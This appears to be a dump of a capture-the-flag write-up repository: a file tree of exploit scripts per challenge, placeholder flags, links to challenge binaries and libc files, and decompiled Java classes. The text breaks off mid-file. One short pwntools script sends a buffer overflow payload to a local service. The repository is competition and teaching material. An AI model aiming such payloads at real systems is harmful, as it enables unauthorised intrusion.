├── codegate-2018 ├── rbSql │ ├── images │ │ ├── index.php │ │ ├── 1.jpg │ │ ├── 2.jpg │ │ ├── 3.png │ │ ├── 4.gif │ │ ├── bg.jpg │ │ ├── join.png │ │ ├── k_03.jpg │ │ ├── login.jpg │ │ ├── wine.jpg │ │ ├── cover2.jpg │ │ └── merong.jpg │ ├── 4bbc327f5b0fd076e005961bcfc4a9ee.php │ ├── 5f0c2baaa2c0426eed9a958e3fe0ff94.php │ ├── style.css │ ├── exploit.php │ ├── index.php │ └── dbconn.php ├── zoo │ ├── zoo │ ├── libc.so.6 │ ├── .gdbinit │ ├── structs.c │ ├── helper.py │ ├── dec.c │ └── exploit.py ├── super-marimo │ ├── marimo │ ├── libc.so.6 │ └── exploit.py └── baskin-robins │ ├── BaskinRobins31 │ └── exploit.py ├── csaw-ctf-2013 ├── exploitation-3 │ ├── key │ ├── fil_chal │ └── exploit.py ├── exploitation-1 │ ├── key │ ├── exploit1 │ └── exploit.py └── exploitation-2 │ ├── key │ ├── exploit2 │ └── exploit.py ├── securinets-2018 ├── boobs │ ├── flag.txt │ ├── boobs │ └── exploit.py ├── protect │ ├── protect │ └── exploit.py ├── format-me │ ├── format │ └── exploit.py ├── no-mercy │ ├── libc.so.6 │ ├── no_mercy │ └── exploit.py └── special │ └── writeup ├── tuctf-2018 ├── canary │ ├── flag │ ├── canary │ ├── password │ └── exploit.py └── lisa │ ├── flag │ ├── lisa │ ├── password │ └── exploit.py ├── insomni-hack-17 ├── babyfirst │ ├── flag.txt │ ├── babyfirst │ └── exploit.py └── wheelofrobots │ ├── wheelofrobots │ └── exploit.py ├── insomni-hack-18 ├── magichat │ ├── client │ │ ├── .gitignore │ │ ├── lib │ │ │ ├── commons-lang3-3.7.jar │ │ │ ├── mockito-all-1.9.5.jar │ │ │ └── commons-collections-3.2.2.jar │ │ ├── src │ │ │ └── ch │ │ │ │ └── scrt │ │ │ │ ├── model │ │ │ │ ├── Gem.java │ │ │ │ ├── Frog.java │ │ │ │ ├── Lamp.java │ │ │ │ ├── TeaSet.java │ │ │ │ ├── Wand.java │ │ │ │ ├── Cauldron.java │ │ │ │ ├── Mirror.java │ │ │ │ ├── Broomstick.java │ │ │ │ ├── Scroll.java │ │ │ │ ├── Hat.java │ │ │ │ └── Artifact.java │ │ │ │ ├── WizardAPI.java │ │ │ │ ├── MyExploit.java │ │ │ │ └── Muggle.java │ │ ├── .project │ │ └── .classpath │ ├── server │ │ ├── .gitignore │ 
│ ├── lib │ │ │ ├── commons-lang3-3.7.jar │ │ │ └── commons-collections-3.2.2.jar │ │ ├── src │ │ │ └── ch │ │ │ │ └── scrt │ │ │ │ ├── model │ │ │ │ ├── Gem.java │ │ │ │ ├── Frog.java │ │ │ │ ├── Lamp.java │ │ │ │ ├── TeaSet.java │ │ │ │ ├── Wand.java │ │ │ │ ├── Cauldron.java │ │ │ │ ├── Mirror.java │ │ │ │ ├── Broomstick.java │ │ │ │ ├── Scroll.java │ │ │ │ ├── Hat.java │ │ │ │ └── Artifact.java │ │ │ │ ├── WizardAPI.java │ │ │ │ ├── Server.java │ │ │ │ └── WizardAPIImpl.java │ │ ├── .project │ │ └── .classpath │ └── README.md └── sapeloshop │ ├── libc-2.23.so │ ├── sapeloshop │ ├── footer.html │ ├── order.html │ ├── header.html │ ├── exploit.py │ └── index.html ├── 34c3ctf-2017 └── 300 │ ├── 300 │ ├── libc.so.6 │ └── exploit.py ├── hacklu-2014 └── oreo │ ├── oreo │ └── exploit.py ├── hacklu-2017 ├── exam │ ├── exam │ └── exploit.py ├── HeapsOfPrint │ ├── libc.so.6 │ ├── HeapsOfPrint │ └── exploit.py ├── heapheaven │ ├── HeapHeaven │ └── exploit.py └── multi-o-flow │ ├── mult-o-flow │ └── exploit.py ├── n1ctf-2018 └── vote │ ├── vote │ ├── libc-2.23.so │ └── exploit.py ├── rctf-2017 ├── rnote │ ├── RNote │ ├── libc.so.6 │ └── exploit.py └── rnote2 │ ├── RNote2 │ ├── libc.so.6 │ └── exploit.py ├── 30c3-2013 └── bigdata │ ├── server │ └── exploit.py ├── rctf-2018 ├── RNote3 │ ├── RNote3 │ ├── libc.so.6 │ └── exploit.py ├── RNote4 │ ├── RNote4 │ ├── libc.so.6 │ └── exploit.py ├── babyheap │ ├── babyheap │ ├── libc.so.6 │ └── exploit.py └── stringer │ ├── libc.so.6 │ ├── stringer │ └── exploit.py ├── asis-finals-2018 └── mem0 │ ├── memo │ └── exploit-16.04.py ├── advent-2021 └── santazon │ ├── santazon │ ├── libc.so.6 │ └── exploit.py ├── defcon-2015 ├── babyecho │ ├── babyecho │ └── exploit.py └── r0pbaby │ ├── r0pbaby │ └── exploit.py ├── hacklu-2015 └── bookstore │ ├── bookstore │ └── exploit.py ├── hitcon-2015 └── blinkroot │ ├── blinkroot │ └── exploit.py ├── 0ctf-quals-2017 └── babyheap │ ├── babyheap │ └── exploit.py ├── acebear-2018 ├── easy_heap │ ├── 
easy_heap │ ├── easyheap_libc.so.6 │ └── exploit.py └── memo_heap │ ├── memo_heap │ └── exploit.py ├── hitcon-2016 ├── baby-heap-300 │ ├── babyheap │ └── exploit.py ├── secretholder │ ├── secretholder │ └── exploit.py └── sleepyholder │ ├── sleepyholder │ └── exploit.py ├── insomni-hack-finals-18 └── yanc │ ├── yanc │ └── exploit.py ├── meepwn-2018 ├── house_of_card │ ├── libc.so │ ├── house_of_card │ └── exploit.py └── baby-sandbox │ ├── baby-sandbox │ ├── code.c │ └── exploit.py ├── seccon-2017 ├── election-200 │ ├── election │ ├── libc-2.23.so │ └── exploit.py └── videoplayer-500 │ ├── libc.so.6 │ ├── video_player │ └── exploit.py ├── fireshell-2019 └── quotes_list │ ├── libc.so.6 │ ├── quotes_list │ ├── ld-linux-x86-64.so.2 │ └── exploit.py ├── boston-key-party-2016 └── cookbook │ ├── cookbook │ └── exploit.py ├── codegate-2019 └── god-the-reum │ ├── god-the-reum │ ├── libc-2.27.so │ └── exploit.py ├── codegate-final-2015 └── heapster │ ├── heapster │ ├── libc-2.19.so │ └── exploit.py ├── sharif-2018 └── t00p_secrets │ ├── t00p_secrets │ └── exploit.py ├── .gitignore ├── whitehat-grandpix-2018 └── book-store │ ├── BookStore │ ├── libc-2.27.so │ └── exploit.py └── blaze-ctf-2018 └── blazefox ├── test.html ├── exploit.js └── blaze.patch /codegate-2018/rbSql/images/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-3/key: -------------------------------------------------------------------------------- 1 | THIS_IS_KEY 2 | -------------------------------------------------------------------------------- /securinets-2018/boobs/flag.txt: -------------------------------------------------------------------------------- 1 | SAMPLE{FLAG} 2 | -------------------------------------------------------------------------------- /tuctf-2018/canary/flag: 
-------------------------------------------------------------------------------- 1 | flag{test-flag-here} 2 | -------------------------------------------------------------------------------- /tuctf-2018/lisa/flag: -------------------------------------------------------------------------------- 1 | flag{test-flag-here} 2 | -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-1/key: -------------------------------------------------------------------------------- 1 | THIS_IS_THE_KEY 2 | -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-2/key: -------------------------------------------------------------------------------- 1 | THIS_IS_KEY_FILE 2 | -------------------------------------------------------------------------------- /insomni-hack-17/babyfirst/flag.txt: -------------------------------------------------------------------------------- 1 | my_fake_flag 2 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/.gitignore: -------------------------------------------------------------------------------- 1 | /bin/ 2 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/.gitignore: -------------------------------------------------------------------------------- 1 | /bin/ 2 | -------------------------------------------------------------------------------- /34c3ctf-2017/300/300: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/34c3ctf-2017/300/300 -------------------------------------------------------------------------------- /codegate-2018/rbSql/4bbc327f5b0fd076e005961bcfc4a9ee.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 
-------------------------------------------------------------------------------- /codegate-2018/zoo/zoo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/zoo/zoo -------------------------------------------------------------------------------- /hacklu-2014/oreo/oreo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2014/oreo/oreo -------------------------------------------------------------------------------- /hacklu-2017/exam/exam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2017/exam/exam -------------------------------------------------------------------------------- /n1ctf-2018/vote/vote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/n1ctf-2018/vote/vote -------------------------------------------------------------------------------- /rctf-2017/rnote/RNote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2017/rnote/RNote -------------------------------------------------------------------------------- /tuctf-2018/lisa/lisa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/tuctf-2018/lisa/lisa -------------------------------------------------------------------------------- /30c3-2013/bigdata/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/30c3-2013/bigdata/server -------------------------------------------------------------------------------- 
/rctf-2017/rnote2/RNote2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2017/rnote2/RNote2 -------------------------------------------------------------------------------- /rctf-2018/RNote3/RNote3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/RNote3/RNote3 -------------------------------------------------------------------------------- /rctf-2018/RNote4/RNote4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/RNote4/RNote4 -------------------------------------------------------------------------------- /tuctf-2018/canary/canary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/tuctf-2018/canary/canary -------------------------------------------------------------------------------- /34c3ctf-2017/300/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/34c3ctf-2017/300/libc.so.6 -------------------------------------------------------------------------------- /asis-finals-2018/mem0/memo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/asis-finals-2018/mem0/memo -------------------------------------------------------------------------------- /rctf-2017/rnote/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2017/rnote/libc.so.6 -------------------------------------------------------------------------------- /rctf-2017/rnote2/libc.so.6: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2017/rnote2/libc.so.6 -------------------------------------------------------------------------------- /rctf-2018/RNote3/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/RNote3/libc.so.6 -------------------------------------------------------------------------------- /rctf-2018/RNote4/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/RNote4/libc.so.6 -------------------------------------------------------------------------------- /advent-2021/santazon/santazon: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/advent-2021/santazon/santazon -------------------------------------------------------------------------------- /codegate-2018/zoo/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/zoo/libc.so.6 -------------------------------------------------------------------------------- /defcon-2015/babyecho/babyecho: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/defcon-2015/babyecho/babyecho -------------------------------------------------------------------------------- /defcon-2015/r0pbaby/r0pbaby: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/defcon-2015/r0pbaby/r0pbaby -------------------------------------------------------------------------------- /n1ctf-2018/vote/libc-2.23.so: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/n1ctf-2018/vote/libc-2.23.so -------------------------------------------------------------------------------- /rctf-2018/babyheap/babyheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/babyheap/babyheap -------------------------------------------------------------------------------- /rctf-2018/babyheap/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/babyheap/libc.so.6 -------------------------------------------------------------------------------- /rctf-2018/stringer/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/stringer/libc.so.6 -------------------------------------------------------------------------------- /rctf-2018/stringer/stringer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/stringer/stringer -------------------------------------------------------------------------------- /securinets-2018/boobs/boobs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/securinets-2018/boobs/boobs -------------------------------------------------------------------------------- /tuctf-2018/canary/password: -------------------------------------------------------------------------------- 1 | supernotthepasswordpasswordthatisdefinitelynothepasswordsodonteventryitokayokaythanks 2 | -------------------------------------------------------------------------------- /tuctf-2018/lisa/password: 
-------------------------------------------------------------------------------- 1 | supernotthepasswordpasswordthatisdefinitelynothepasswordsodonteventryitokayokaythanks 2 | -------------------------------------------------------------------------------- /advent-2021/santazon/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/advent-2021/santazon/libc.so.6 -------------------------------------------------------------------------------- /hacklu-2015/bookstore/bookstore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2015/bookstore/bookstore -------------------------------------------------------------------------------- /hitcon-2015/blinkroot/blinkroot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hitcon-2015/blinkroot/blinkroot -------------------------------------------------------------------------------- /securinets-2018/protect/protect: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/securinets-2018/protect/protect -------------------------------------------------------------------------------- /0ctf-quals-2017/babyheap/babyheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/0ctf-quals-2017/babyheap/babyheap -------------------------------------------------------------------------------- /acebear-2018/easy_heap/easy_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/acebear-2018/easy_heap/easy_heap 
-------------------------------------------------------------------------------- /acebear-2018/memo_heap/memo_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/acebear-2018/memo_heap/memo_heap -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/1.jpg -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/2.jpg -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/3.png -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/4.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/4.gif -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/bg.jpg -------------------------------------------------------------------------------- /codegate-2018/super-marimo/marimo: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/super-marimo/marimo -------------------------------------------------------------------------------- /codegate-2018/zoo/.gdbinit: -------------------------------------------------------------------------------- 1 | !gcc -gstabs -c structs.c -o structs.o 2 | add-symbol-file structs.o 0 3 | 4 | source helper.py 5 | -------------------------------------------------------------------------------- /hacklu-2017/HeapsOfPrint/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2017/HeapsOfPrint/libc.so.6 -------------------------------------------------------------------------------- /hacklu-2017/heapheaven/HeapHeaven: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2017/heapheaven/HeapHeaven -------------------------------------------------------------------------------- /hitcon-2016/baby-heap-300/babyheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hitcon-2016/baby-heap-300/babyheap -------------------------------------------------------------------------------- /insomni-hack-finals-18/yanc/yanc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-finals-18/yanc/yanc -------------------------------------------------------------------------------- /meepwn-2018/house_of_card/libc.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/meepwn-2018/house_of_card/libc.so -------------------------------------------------------------------------------- /seccon-2017/election-200/election: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/seccon-2017/election-200/election -------------------------------------------------------------------------------- /securinets-2018/format-me/format: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/securinets-2018/format-me/format -------------------------------------------------------------------------------- /securinets-2018/no-mercy/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/securinets-2018/no-mercy/libc.so.6 -------------------------------------------------------------------------------- /securinets-2018/no-mercy/no_mercy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/securinets-2018/no-mercy/no_mercy -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/join.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/join.png -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/k_03.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/k_03.jpg -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/login.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/login.jpg 
-------------------------------------------------------------------------------- /codegate-2018/rbSql/images/wine.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/wine.jpg -------------------------------------------------------------------------------- /codegate-2018/super-marimo/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/super-marimo/libc.so.6 -------------------------------------------------------------------------------- /fireshell-2019/quotes_list/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/fireshell-2019/quotes_list/libc.so.6 -------------------------------------------------------------------------------- /hacklu-2017/multi-o-flow/mult-o-flow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2017/multi-o-flow/mult-o-flow -------------------------------------------------------------------------------- /insomni-hack-17/babyfirst/babyfirst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-17/babyfirst/babyfirst -------------------------------------------------------------------------------- /boston-key-party-2016/cookbook/cookbook: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/boston-key-party-2016/cookbook/cookbook -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/cover2.jpg: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/cover2.jpg -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/merong.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/merong.jpg -------------------------------------------------------------------------------- /codegate-2019/god-the-reum/god-the-reum: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2019/god-the-reum/god-the-reum -------------------------------------------------------------------------------- /codegate-2019/god-the-reum/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2019/god-the-reum/libc-2.27.so -------------------------------------------------------------------------------- /codegate-final-2015/heapster/heapster: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-final-2015/heapster/heapster -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-1/exploit1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/csaw-ctf-2013/exploitation-1/exploit1 -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-2/exploit2: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/csaw-ctf-2013/exploitation-2/exploit2 -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-3/fil_chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/csaw-ctf-2013/exploitation-3/fil_chal -------------------------------------------------------------------------------- /fireshell-2019/quotes_list/quotes_list: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/fireshell-2019/quotes_list/quotes_list -------------------------------------------------------------------------------- /hacklu-2017/HeapsOfPrint/HeapsOfPrint: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2017/HeapsOfPrint/HeapsOfPrint -------------------------------------------------------------------------------- /hitcon-2016/secretholder/secretholder: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hitcon-2016/secretholder/secretholder -------------------------------------------------------------------------------- /hitcon-2016/sleepyholder/sleepyholder: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hitcon-2016/sleepyholder/sleepyholder -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/sapeloshop/libc-2.23.so 
-------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/sapeloshop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/sapeloshop/sapeloshop -------------------------------------------------------------------------------- /meepwn-2018/baby-sandbox/baby-sandbox: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/meepwn-2018/baby-sandbox/baby-sandbox -------------------------------------------------------------------------------- /meepwn-2018/house_of_card/house_of_card: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/meepwn-2018/house_of_card/house_of_card -------------------------------------------------------------------------------- /seccon-2017/election-200/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/seccon-2017/election-200/libc-2.23.so -------------------------------------------------------------------------------- /seccon-2017/videoplayer-500/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/seccon-2017/videoplayer-500/libc.so.6 -------------------------------------------------------------------------------- /sharif-2018/t00p_secrets/t00p_secrets: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/sharif-2018/t00p_secrets/t00p_secrets -------------------------------------------------------------------------------- /.gitignore: 
-------------------------------------------------------------------------------- 1 | *.i64 2 | *.id* 3 | *.nam 4 | *.til 5 | *~ 6 | .\#* 7 | \#* 8 | core 9 | .gdb_history 10 | *.class 11 | 12 | todo 13 | -------------------------------------------------------------------------------- /acebear-2018/easy_heap/easyheap_libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/acebear-2018/easy_heap/easyheap_libc.so.6 -------------------------------------------------------------------------------- /codegate-final-2015/heapster/libc-2.19.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-final-2015/heapster/libc-2.19.so -------------------------------------------------------------------------------- /insomni-hack-18/magichat/README.md: -------------------------------------------------------------------------------- 1 | # MagicHat 2 | 3 | To implement locally, I have written a dummy server that emulates the actual one. 
4 | -------------------------------------------------------------------------------- /seccon-2017/videoplayer-500/video_player: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/seccon-2017/videoplayer-500/video_player -------------------------------------------------------------------------------- /codegate-2018/baskin-robins/BaskinRobins31: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/baskin-robins/BaskinRobins31 -------------------------------------------------------------------------------- /insomni-hack-17/wheelofrobots/wheelofrobots: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-17/wheelofrobots/wheelofrobots -------------------------------------------------------------------------------- /whitehat-grandpix-2018/book-store/BookStore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/whitehat-grandpix-2018/book-store/BookStore -------------------------------------------------------------------------------- /whitehat-grandpix-2018/book-store/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/whitehat-grandpix-2018/book-store/libc-2.27.so -------------------------------------------------------------------------------- /fireshell-2019/quotes_list/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/fireshell-2019/quotes_list/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- 
/insomni-hack-18/magichat/client/lib/commons-lang3-3.7.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/magichat/client/lib/commons-lang3-3.7.jar -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/lib/mockito-all-1.9.5.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/magichat/client/lib/mockito-all-1.9.5.jar -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/lib/commons-lang3-3.7.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/magichat/server/lib/commons-lang3-3.7.jar -------------------------------------------------------------------------------- /blaze-ctf-2018/blazefox/test.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/lib/commons-collections-3.2.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/magichat/client/lib/commons-collections-3.2.2.jar -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/lib/commons-collections-3.2.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/magichat/server/lib/commons-collections-3.2.2.jar -------------------------------------------------------------------------------- 
/csaw-ctf-2013/exploitation-1/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = process("./exploit1") 4 | 5 | conn = remote("localhost", 31337) 6 | 7 | payload = "a"*1020 8 | conn.sendline(payload) 9 | conn.interactive() -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Gem.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Gem 9 | extends Artifact { 10 | private static final long serialVersionUID = -6218570363073309827L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Gem.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Gem 9 | extends Artifact { 10 | private static final long serialVersionUID = -6218570363073309827L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Frog.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Frog 9 | extends Artifact { 10 | private static final long serialVersionUID = 1541961207696730155L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Lamp.java: -------------------------------------------------------------------------------- 1 | /* 2 | * 